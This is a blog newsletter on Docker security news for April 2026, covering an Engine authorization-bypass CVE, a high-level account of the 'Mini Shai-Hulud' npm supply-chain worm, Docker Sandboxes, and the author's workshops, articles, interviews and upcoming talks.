Welcome to the second issue of Docker Security Dispatch. April was a whirlwind of conferences, articles, and interviews. From the cathedrals of Cologne to the mountains of Zurich, here is everything that happened in the Docker security world last month.
Key Takeaways
- Stay informed about critical vulnerabilities like CVE-2026-34040 and the 'Mini Shai-Hulud' supply chain worm.
- Discover the benefits of Docker Sandboxes for isolating development environments against malware.
- Recap of the Java-focused Docker Commandos workshop delivered at JCON Europe 2026.
- Insights from industry experts on container security and operationalizing AI with Docker.
🛡️ Critical: CVE-2026-34040 & The Mini Shai-Hulud "Gift"
The biggest news in the Docker security scene this month was the disclosure of CVE-2026-34040. This is a high-severity authorization bypass vulnerability that affected Docker Engine versions before 29.3.1. If an API request body exceeded 1MB, the AuthZ plugin would be bypassed. Please ensure you have updated to Docker Engine 29.4.2 or Docker Desktop 4.71.0.
Speaking of security "gifts," as I turned 35 on April 29, the universe (or TeamPCP) decided to send a satirical birthday present: Mini Shai-Hulud.
This third wave of the Shai-Hulud lineage emerged on my birthday and is a highly autonomous NPM supply chain worm. It heavily targeted the SAP cloud ecosystem (infecting @cap-js/sqlite and @cap-js/postgres), harvesting tokens to backdoor other packages. The attack uses a malicious preinstall hook to download the Bun runtime—bypassing Node-based security tooling—and execute an 11.7 MB obfuscated credential stealer. Most disturbingly, it installs persistence hooks directly in your IDE settings, specifically modifying .vscode/tasks.json to trigger on folderOpen.
Mini Shai-Hulud: The Next Evolution of NPM Supply Chain Worms - Docker and Kubernetes Security
A deep dive into the Mini Shai-Hulud attack, a sophisticated NPM worm that uses the Bun runtime to bypass security and targets developer agents for persistence.
dockersecurity.io
In better news, Docker Sandboxes (Beta) are helpful against Mini Shai-Hulud. They allow you to run your AI coding agents like Claude in an isolated microVM, preventing Mini Shai-Hulud-style attacks from compromising your development environment:
sbx run claude
🏛️ JCON Europe: The Commandos in Cologne
On April 20, I was at JCON Europe 2026 in Cologne, and delivered the "Java Supply Chain Security with Docker" workshop—a Java-focused adaptation of the Docker Commandos series.
The workshop is available as a Docker Labspace, providing a guided, interactive environment.
If you don't have the Labspace extension installed in Docker Desktop, you can still run the full mission locally using the OCI artifact:
docker compose -f oci://docker.io/aerabi/docker-commandos-labspace up -d
Learn more:
Java Supply Chain Security with Docker — Docker Commandos Workshop - Docker and Kubernetes Security
Docker Commandos adapted for a Java audience at JCON Europe 2026. Supply chain security, SBOMs, and attestations — using Docker tooling with a Java project as the target.
dockersecurity.io
🎙️ Interview with Baruch Sadogursky
While at JCON, I sat down with the legendary Baruch Sadogursky (@jbaruch) for an interview with Tessl and JAVAPRO.
We discussed, surprise surprise, container supply chain security.
📰 JAVAPRO: "The Whispering JAR"
Speaking of JAVAPRO, my latest article for them also dropped during the conference: "The Whispering JAR: Java Security Lessons Hidden in a Fantasy Tale".
It's a narrative-driven look at the latest supply chain attacks hidden in a fantasy setting—similar in spirit to Black Forest Shadow, and happening right after the events of the book. It discusses the following attacks:
- NPM supply chain attack of September 2025
- The Shai-Hulud 1 and 2 attacks of late 2025
- React2Shell, the React-based remote code execution attack of late 2025
javapro.io
🐧 Foojay.io Debut
I am also thrilled to have published my first article on Foojay.io (the Friends of OpenJDK platform) this month: "Dockerizing a Java 26 Project with Docker Init".
Dockerizing a Java 26 Project with Docker Init
Java 26 came out in March 2026. This article walks you through Dockerizing a Java 26 Spring Boot project using Docker Init.
foojay.io
🎙️ JobRad Podcast: Writing a Tech Book
JobRad's tech podcast, Increase Cycle Time, is out, and I'm on it! 🎙️
I sat down with Holger Grosse-Plankermann and Urs Lange to talk about the behind-the-scenes of writing a tech book like Docker and Kubernetes Security. We discussed the research process, the challenges of keeping up with a fast-moving ecosystem, and what it takes to get from a rough draft to a published book.
Folge 10: Writing a tech book - Increase Cycle Time - Der JobRad® Development Podcast
Hello lovely people from the interwebs, In this episode we have a chat with our dear colleague Mohammad-Ali A'râbi. Mo wrote a book about Docker Security. Even though the content of this book is great. (Hint! Read the book: https://www.dockersecurity.io/), in this episode Urs and Holger are more interested in what it is like to write a book? Why do this after all? What are the hurdles? How do you keep your motivation high? And what one needs to do, if you are thinking: I want to write a book too! All this and more in the current episode of Increase Cycle Time.
jobrad-increase-cycle-time.podigee.io
🤖 Book: Operational AI with Docker
I'm excited to announce that I served as a technical reviewer for the new book "Operational AI with Docker", published by Packt. As AI models become a standard part of our containerized workloads, this book is a fantastic guide for anyone looking to run LLMs in production using Docker.
🏔️ Upcoming: DevOpsDays Zurich & Berlin
Recently, I headed to DevOpsDays Zurich (May the 6th) to give my talk: "Beyond SBOMs: The Future of Container Supply Chain Security". I'll write more about it in the coming issue.
I'm also happy to share that this talk was also accepted for WeAreDevelopers World Congress in Berlin this July. I can't wait to bring the Commandos to the big stage in Berlin! So, if you missed it in Zurich, we'll catch you in Berlin!
Until next time, and let's hope there are no more "gifts" from the universe in May!
Top comments (0)